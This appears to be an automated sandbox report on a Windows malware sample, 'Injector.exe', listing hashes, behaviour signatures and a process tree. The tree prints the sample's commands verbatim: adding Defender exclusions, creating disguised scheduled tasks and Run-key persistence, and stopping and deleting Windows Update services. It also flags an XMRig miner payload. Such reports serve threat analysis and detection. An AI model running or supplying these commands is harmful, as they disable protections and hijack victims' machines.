Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
26-09-2022 18:44
Static task
static1
Behavioral task
behavioral1
Sample
INJECTOR/Injector.exe
Resource
win7-20220812-en
General
-
Target
INJECTOR/Injector.exe
-
Size
681.1MB
-
MD5
f57c9332808a063901254cd41eef7613
-
SHA1
67df58792e9a9d3c3d00e39753873fcf6ef2ae5f
-
SHA256
2b50d8d9acaab4c8679d87d37dda1e97464e3bdbb00c942277c58d7532098a50
-
SHA512
e032ca3899a93170f8a3e2d4be32deb66f21c5de02fc9f453bfd3709c0f54ff5eb75db58777ca1565dd57632b7c125de776b69737e8554761e1e15fd3b98e0eb
-
SSDEEP
393216:zKAhcUJ09+imj7+mmFygBWbln6eqOBZC517HNohLBn5Iv/vQ:2O090j7nmFVWhn/qOB8JiaQ
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
Processes:
UNNAMED3.exechromeupdater.execonhost.exedescription pid process target process PID 2492 created 2596 2492 UNNAMED3.exe Explorer.EXE PID 2492 created 2596 2492 UNNAMED3.exe Explorer.EXE PID 2492 created 2596 2492 UNNAMED3.exe Explorer.EXE PID 2492 created 2596 2492 UNNAMED3.exe Explorer.EXE PID 2492 created 2596 2492 UNNAMED3.exe Explorer.EXE PID 3668 created 2596 3668 chromeupdater.exe Explorer.EXE PID 3668 created 2596 3668 chromeupdater.exe Explorer.EXE PID 3668 created 2596 3668 chromeupdater.exe Explorer.EXE PID 3668 created 2596 3668 chromeupdater.exe Explorer.EXE PID 4836 created 2596 4836 conhost.exe Explorer.EXE PID 3668 created 2596 3668 chromeupdater.exe Explorer.EXE PID 3668 created 2596 3668 chromeupdater.exe Explorer.EXE -
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/1472-228-0x00007FF6DFD30000-0x00007FF6E0524000-memory.dmp xmrig behavioral2/memory/1472-230-0x00007FF6DFD30000-0x00007FF6E0524000-memory.dmp xmrig -
Drops file in Drivers directory 2 IoCs
Processes:
UNNAMED3.exechromeupdater.exedescription ioc process File created C:\Windows\system32\drivers\etc\hosts UNNAMED3.exe File created C:\Windows\system32\drivers\etc\hosts chromeupdater.exe -
Executes dropped EXE 6 IoCs
Processes:
UNNAMED.exeUNNAMED2.exeUNNAMED3.exeUNNAMED4.exeWindows Security Health Service.exechromeupdater.exepid process 1796 UNNAMED.exe 1876 UNNAMED2.exe 2492 UNNAMED3.exe 2564 UNNAMED4.exe 2256 Windows Security Health Service.exe 3668 chromeupdater.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule behavioral2/memory/1472-228-0x00007FF6DFD30000-0x00007FF6E0524000-memory.dmp upx behavioral2/memory/1472-230-0x00007FF6DFD30000-0x00007FF6E0524000-memory.dmp upx -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Injector.exeUNNAMED4.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation Injector.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation UNNAMED4.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in System32 directory 3 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
UNNAMED3.exechromeupdater.exepid process 2492 UNNAMED3.exe 2492 UNNAMED3.exe 3668 chromeupdater.exe 3668 chromeupdater.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
chromeupdater.exedescription pid process target process PID 3668 set thread context of 4836 3668 chromeupdater.exe conhost.exe PID 3668 set thread context of 1472 3668 chromeupdater.exe svchost.exe -
Drops file in Program Files directory 4 IoCs
Processes:
cmd.exeUNNAMED3.exechromeupdater.execmd.exedescription ioc process File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\chromeupdater.exe UNNAMED3.exe File created C:\Program Files\Google\Libs\WR64.sys chromeupdater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1104 sc.exe 1016 sc.exe 1756 sc.exe 4368 sc.exe 5100 sc.exe 4280 sc.exe 1388 sc.exe 3152 sc.exe 4908 sc.exe 3884 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeUNNAMED3.exepowershell.exepowershell.exepowershell.exechromeupdater.exepowershell.exepowershell.execonhost.exesvchost.exepid process 320 powershell.exe 320 powershell.exe 2492 UNNAMED3.exe 2492 UNNAMED3.exe 2492 UNNAMED3.exe 2492 UNNAMED3.exe 4880 powershell.exe 4880 powershell.exe 2492 UNNAMED3.exe 2492 UNNAMED3.exe 2492 UNNAMED3.exe 2492 UNNAMED3.exe 1624 powershell.exe 1624 powershell.exe 2492 UNNAMED3.exe 2492 UNNAMED3.exe 2492 UNNAMED3.exe 2492 UNNAMED3.exe 2792 powershell.exe 2792 powershell.exe 3668 chromeupdater.exe 3668 chromeupdater.exe 3668 chromeupdater.exe 3668 chromeupdater.exe 208 powershell.exe 208 powershell.exe 3668 chromeupdater.exe 3668 chromeupdater.exe 3668 chromeupdater.exe 3668 chromeupdater.exe 3304 powershell.exe 3304 powershell.exe 3668 chromeupdater.exe 3668 chromeupdater.exe 4836 conhost.exe 4836 conhost.exe 3668 chromeupdater.exe 3668 chromeupdater.exe 3668 chromeupdater.exe 3668 chromeupdater.exe 1472 svchost.exe 1472 svchost.exe 1472 svchost.exe 1472 svchost.exe 1472 svchost.exe 1472 svchost.exe 1472 svchost.exe 1472 svchost.exe 1472 svchost.exe 1472 svchost.exe 1472 svchost.exe 1472 svchost.exe 1472 svchost.exe 1472 svchost.exe 1472 svchost.exe 1472 svchost.exe 1472 svchost.exe 1472 svchost.exe 1472 svchost.exe 1472 svchost.exe 1472 svchost.exe 1472 svchost.exe 1472 svchost.exe 1472 svchost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 656 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 320 powershell.exe Token: SeDebugPrivilege 4880 powershell.exe Token: SeDebugPrivilege 1624 powershell.exe Token: SeIncreaseQuotaPrivilege 1624 powershell.exe Token: SeSecurityPrivilege 1624 powershell.exe Token: SeTakeOwnershipPrivilege 1624 powershell.exe Token: SeLoadDriverPrivilege 1624 powershell.exe Token: SeSystemProfilePrivilege 1624 powershell.exe Token: SeSystemtimePrivilege 1624 powershell.exe Token: SeProfSingleProcessPrivilege 1624 powershell.exe Token: SeIncBasePriorityPrivilege 1624 powershell.exe Token: SeCreatePagefilePrivilege 1624 powershell.exe Token: SeBackupPrivilege 1624 powershell.exe Token: SeRestorePrivilege 1624 powershell.exe Token: SeShutdownPrivilege 1624 powershell.exe Token: SeDebugPrivilege 1624 powershell.exe Token: SeSystemEnvironmentPrivilege 1624 powershell.exe Token: SeRemoteShutdownPrivilege 1624 powershell.exe Token: SeUndockPrivilege 1624 powershell.exe Token: SeManageVolumePrivilege 1624 powershell.exe Token: 33 1624 powershell.exe Token: 34 1624 powershell.exe Token: 35 1624 powershell.exe Token: 36 1624 powershell.exe Token: SeIncreaseQuotaPrivilege 1624 powershell.exe Token: SeSecurityPrivilege 1624 powershell.exe Token: SeTakeOwnershipPrivilege 1624 powershell.exe Token: SeLoadDriverPrivilege 1624 powershell.exe Token: SeSystemProfilePrivilege 1624 powershell.exe Token: SeSystemtimePrivilege 1624 powershell.exe Token: SeProfSingleProcessPrivilege 1624 powershell.exe Token: SeIncBasePriorityPrivilege 1624 powershell.exe Token: SeCreatePagefilePrivilege 1624 powershell.exe Token: SeBackupPrivilege 1624 powershell.exe Token: SeRestorePrivilege 1624 powershell.exe Token: SeShutdownPrivilege 1624 powershell.exe Token: SeDebugPrivilege 1624 powershell.exe Token: SeSystemEnvironmentPrivilege 1624 powershell.exe Token: SeRemoteShutdownPrivilege 1624 powershell.exe Token: SeUndockPrivilege 1624 powershell.exe Token: SeManageVolumePrivilege 1624 powershell.exe Token: 33 1624 powershell.exe Token: 34 1624 powershell.exe Token: 35 1624 powershell.exe Token: 36 1624 powershell.exe Token: SeIncreaseQuotaPrivilege 1624 powershell.exe Token: SeSecurityPrivilege 1624 powershell.exe Token: SeTakeOwnershipPrivilege 1624 powershell.exe Token: SeLoadDriverPrivilege 1624 powershell.exe Token: SeSystemProfilePrivilege 1624 powershell.exe Token: SeSystemtimePrivilege 1624 powershell.exe Token: SeProfSingleProcessPrivilege 1624 powershell.exe Token: SeIncBasePriorityPrivilege 1624 powershell.exe Token: SeCreatePagefilePrivilege 1624 powershell.exe Token: SeBackupPrivilege 1624 powershell.exe Token: SeRestorePrivilege 1624 powershell.exe Token: SeShutdownPrivilege 1624 powershell.exe Token: SeDebugPrivilege 1624 powershell.exe Token: SeSystemEnvironmentPrivilege 1624 powershell.exe Token: SeRemoteShutdownPrivilege 1624 powershell.exe Token: SeUndockPrivilege 1624 powershell.exe Token: SeManageVolumePrivilege 1624 powershell.exe Token: 33 1624 powershell.exe Token: 34 1624 powershell.exe -
Suspicious use of WriteProcessMemory 63 IoCs
Processes:
Injector.exeUNNAMED4.execmd.execmd.exepowershell.execmd.exechromeupdater.execmd.exedescription pid process target process PID 2080 wrote to memory of 320 2080 Injector.exe powershell.exe PID 2080 wrote to memory of 320 2080 Injector.exe powershell.exe PID 2080 wrote to memory of 1796 2080 Injector.exe UNNAMED.exe PID 2080 wrote to memory of 1796 2080 Injector.exe UNNAMED.exe PID 2080 wrote to memory of 1796 2080 Injector.exe UNNAMED.exe PID 2080 wrote to memory of 1876 2080 Injector.exe UNNAMED2.exe PID 2080 wrote to memory of 1876 2080 Injector.exe UNNAMED2.exe PID 2080 wrote to memory of 2492 2080 Injector.exe UNNAMED3.exe PID 2080 wrote to memory of 2492 2080 Injector.exe UNNAMED3.exe PID 2080 wrote to memory of 2564 2080 Injector.exe UNNAMED4.exe PID 2080 wrote to memory of 2564 2080 Injector.exe UNNAMED4.exe PID 2564 wrote to memory of 4288 2564 UNNAMED4.exe schtasks.exe PID 2564 wrote to memory of 4288 2564 UNNAMED4.exe schtasks.exe PID 2564 wrote to memory of 2256 2564 UNNAMED4.exe Windows Security Health Service.exe PID 2564 wrote to memory of 2256 2564 UNNAMED4.exe Windows Security Health Service.exe PID 3048 wrote to memory of 4280 3048 cmd.exe sc.exe PID 3048 wrote to memory of 4280 3048 cmd.exe sc.exe PID 3048 wrote to memory of 1388 3048 cmd.exe sc.exe PID 3048 wrote to memory of 1388 3048 cmd.exe sc.exe PID 3048 wrote to memory of 3152 3048 cmd.exe sc.exe PID 3048 wrote to memory of 3152 3048 cmd.exe sc.exe PID 3048 wrote to memory of 1104 3048 cmd.exe sc.exe PID 3048 wrote to memory of 1104 3048 cmd.exe sc.exe PID 3048 wrote to memory of 1016 3048 cmd.exe sc.exe PID 3048 wrote to memory of 1016 3048 cmd.exe sc.exe PID 3048 wrote to memory of 4060 3048 cmd.exe reg.exe PID 3048 wrote to memory of 4060 3048 cmd.exe reg.exe PID 3048 wrote to memory of 4380 3048 cmd.exe reg.exe PID 3048 wrote to memory of 4380 3048 cmd.exe reg.exe PID 3048 wrote to memory of 400 3048 cmd.exe reg.exe PID 3048 wrote to memory of 400 3048 cmd.exe reg.exe PID 3048 wrote to memory of 4808 3048 cmd.exe reg.exe PID 3048 wrote to memory of 4808 3048 cmd.exe reg.exe PID 3048 wrote to memory of 4472 3048 cmd.exe reg.exe PID 3048 wrote to memory of 4472 3048 cmd.exe reg.exe PID 3624 wrote to memory of 4668 3624 cmd.exe choice.exe PID 3624 wrote to memory of 4668 3624 cmd.exe choice.exe PID 2792 wrote to memory of 1680 2792 powershell.exe schtasks.exe PID 2792 wrote to memory of 1680 2792 powershell.exe schtasks.exe PID 1600 wrote to memory of 1756 1600 cmd.exe sc.exe PID 1600 wrote to memory of 1756 1600 cmd.exe sc.exe PID 1600 wrote to memory of 4908 1600 cmd.exe sc.exe PID 1600 wrote to memory of 4908 1600 cmd.exe sc.exe PID 1600 wrote to memory of 5100 1600 cmd.exe sc.exe PID 1600 wrote to memory of 5100 1600 cmd.exe sc.exe PID 1600 wrote to memory of 4368 1600 cmd.exe sc.exe PID 1600 wrote to memory of 4368 1600 cmd.exe sc.exe PID 1600 wrote to memory of 3884 1600 cmd.exe sc.exe PID 1600 wrote to memory of 3884 1600 cmd.exe sc.exe PID 1600 wrote to memory of 4116 1600 cmd.exe reg.exe PID 1600 wrote to memory of 4116 1600 cmd.exe reg.exe PID 1600 wrote to memory of 4864 1600 cmd.exe reg.exe PID 1600 wrote to memory of 4864 1600 cmd.exe reg.exe PID 1600 wrote to memory of 3320 1600 cmd.exe reg.exe PID 1600 wrote to memory of 3320 1600 cmd.exe reg.exe PID 1600 wrote to memory of 2328 1600 cmd.exe reg.exe PID 1600 wrote to memory of 2328 1600 cmd.exe reg.exe PID 1600 wrote to memory of 4868 1600 cmd.exe reg.exe PID 1600 wrote to memory of 4868 1600 cmd.exe reg.exe PID 3668 wrote to memory of 4836 3668 chromeupdater.exe conhost.exe PID 3092 wrote to memory of 4400 3092 cmd.exe WMIC.exe PID 3092 wrote to memory of 4400 3092 cmd.exe WMIC.exe PID 3668 wrote to memory of 1472 3668 chromeupdater.exe svchost.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\INJECTOR\Injector.exe"C:\Users\Admin\AppData\Local\Temp\INJECTOR\Injector.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdABrACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAaQB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAaABuACMAPgA="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\UNNAMED.exe"C:\Users\Admin\AppData\Local\Temp\UNNAMED.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\UNNAMED2.exe"C:\Users\Admin\AppData\Local\Temp\UNNAMED2.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\UNNAMED3.exe"C:\Users\Admin\AppData\Local\Temp\UNNAMED3.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\UNNAMED4.exe"C:\Users\Admin\AppData\Local\Temp\UNNAMED4.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /rl highest /tn Windows Security Health Service /tr "C:\Users\Admin\AppData\Roaming\Microsoft\WindowsSecurityHealthService\Windows Security Health Service.exe" /f4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\WindowsSecurityHealthService\Windows Security Health Service.exe"C:\Users\Admin\AppData\Roaming\Microsoft\WindowsSecurityHealthService\Windows Security Health Service.exe"4⤵
- Executes dropped EXE
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe <#thakcjdi#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Google' /tr '''C:\Program Files\Google\chromeupdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\chromeupdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Google' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Google" /t REG_SZ /f /d 'C:\Program Files\Google\chromeupdater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\UNNAMED3.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe <#nkdsuy#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "Google" } Else { "C:\Program Files\Google\chromeupdater.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn Google3⤵
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
